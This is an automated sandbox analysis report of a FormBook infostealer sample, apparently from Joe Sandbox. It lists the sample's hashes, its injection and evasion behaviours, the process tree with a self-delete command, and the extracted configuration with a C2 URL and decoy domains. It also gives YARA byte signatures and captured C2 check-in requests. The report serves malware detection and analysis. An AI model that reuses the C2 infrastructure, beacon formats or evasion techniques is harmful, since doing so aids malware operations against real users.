Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report NQBNpLezqZKv1P4.exe

Overview

General Information

Sample Name:NQBNpLezqZKv1P4.exe
Analysis ID:452473
MD5:f03bf8d3ecc2ae4b40f836c59ac09bdf
SHA1:58f48a5a960eac4ee1f33ea16075cfd44f37b3a3
SHA256:2e4cf88a434d484057fcc090cb7de5deb6d30c8e00da339c886f2482f6a7ebe1
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • NQBNpLezqZKv1P4.exe (PID: 6940 cmdline: 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe' MD5: F03BF8D3ECC2AE4B40F836C59AC09BDF)
    • NQBNpLezqZKv1P4.exe (PID: 3984 cmdline: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe MD5: F03BF8D3ECC2AE4B40F836C59AC09BDF)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 7056 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 7012 cmdline: /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extraclass.xyz/4nn8/"], "decoy": ["chamtowon.com", "yaaquu.com", "thepettybox.com", "zrcezzfdfkyjlir.com", "finalcutgrowshop.com", "856381151.xyz", "fbgroupsmadesimple.com", "thinktank-texas.com", "shoppingsys.com", "natezubal.com", "skyhighbud.com", "toddlely.net", "bachelor-boys.com", "blogdepr.com", "chuanyigou.com", "photocouture-show.com", "spacetasks.com", "kureitall.com", "qmcp00033.com", "visiodaya.com", "teleasistencianamaste.com", "updates-app.com", "marbleheadelementary.com", "jameswilliamgordon.com", "bouncingbellybeans.com", "icloud-site-fd.com", "hotradioarnhem.com", "shengdagp.com", "sickrime.com", "17545bullock.com", "cmovied.com", "wwwpaturnoiketollbyplate.com", "qphis.com", "vhsstores.com", "sorcierebienaimee.com", "y7mioung.xyz", "indianapartylines.com", "fezze.info", "uweup.com", "xn--gestinvalenciana-9ub.com", "creativeartaadda.com", "cattedralidismeraldo.com", "thecarestudio.com", "etruruueurt.xyz", "sidehustle.kiwi", "hagumee.com", "sdkqglgs.com", "nirvananaturalcbd.net", "grassth.com", "zeugmagiftandmore.com", "smartscene.club", "chsecv.com", "gettothecoast.com", "whiskey-friends.com", "ambernai.com", "iregentos.info", "sh-zzjy.com", "boicity.com", "sgtcsleathers.net", "themixedveggies.com", "greenbanc.net", "papiempanadas.com", "ndirxk.club", "iafzal.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        4.2.NQBNpLezqZKv1P4.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.NQBNpLezqZKv1P4.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.extraclass.xyz/4nn8/"], "decoy": ["chamtowon.com", "yaaquu.com", "thepettybox.com", "zrcezzfdfkyjlir.com", "finalcutgrowshop.com", "856381151.xyz", "fbgroupsmadesimple.com", "thinktank-texas.com", "shoppingsys.com", "natezubal.com", "skyhighbud.com", "toddlely.net", "bachelor-boys.com", "blogdepr.com", "chuanyigou.com", "photocouture-show.com", "spacetasks.com", "kureitall.com", "qmcp00033.com", "visiodaya.com", "teleasistencianamaste.com", "updates-app.com", "marbleheadelementary.com", "jameswilliamgordon.com", "bouncingbellybeans.com", "icloud-site-fd.com", "hotradioarnhem.com", "shengdagp.com", "sickrime.com", "17545bullock.com", "cmovied.com", "wwwpaturnoiketollbyplate.com", "qphis.com", "vhsstores.com", "sorcierebienaimee.com", "y7mioung.xyz", "indianapartylines.com", "fezze.info", "uweup.com", "xn--gestinvalenciana-9ub.com", "creativeartaadda.com", "cattedralidismeraldo.com", "thecarestudio.com", "etruruueurt.xyz", "sidehustle.kiwi", "hagumee.com", "sdkqglgs.com", "nirvananaturalcbd.net", "grassth.com", "zeugmagiftandmore.com", "smartscene.club", "chsecv.com", "gettothecoast.com", "whiskey-friends.com", "ambernai.com", "iregentos.info", "sh-zzjy.com", "boicity.com", "sgtcsleathers.net", "themixedveggies.com", "greenbanc.net", "papiempanadas.com", "ndirxk.club", "iafzal.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: NQBNpLezqZKv1P4.exeJoe Sandbox ML: detected
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: NQBNpLezqZKv1P4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: NQBNpLezqZKv1P4.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4x nop then pop ebx4_2_00406A94
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4x nop then pop edi4_2_0041567E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx10_2_00956A95
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi10_2_0096567E

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.extraclass.xyz/4nn8/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.boicity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.sh-zzjy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.zrcezzfdfkyjlir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.iafzal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.nirvananaturalcbd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.updates-app.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.fbgroupsmadesimple.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.boicity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.sh-zzjy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.zrcezzfdfkyjlir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.iafzal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.nirvananaturalcbd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.updates-app.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.fbgroupsmadesimple.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.boicity.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 11:15:39 GMTServer: ApacheSet-Cookie: is_mobile=0; path=/; domain=www.zrcezzfdfkyjlir.comVary: X-W-SSL,User-AgentSet-Cookie: language=en; expires=Thu, 05-Aug-2021 11:15:39 GMT; Max-Age=1209600; path=/Cache-Control: privateX-Host: pages3.sf2p.intern.weebly.netX-UA-Compatible: IE=edge,chrome=1Content-Length: 3802Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 32 36 34 35 31 37 34 35 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65
          Source: NETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmpString found in binary or memory: http://050005.voodoo.com/js/partner.js
          Source: NQBNpLezqZKv1P4.exeString found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com(
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.comp
          Source: NQBNpLezqZKv1P4.exeString found in binary or memory: http://twitter.com/statuses/user_timeline.xml?screen_name=
          Source: explorer.exe, 00000005.00000000.702532502.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comR
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641810889.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comen
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comroa
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.645535031.000000000555E000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640649210.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/ct
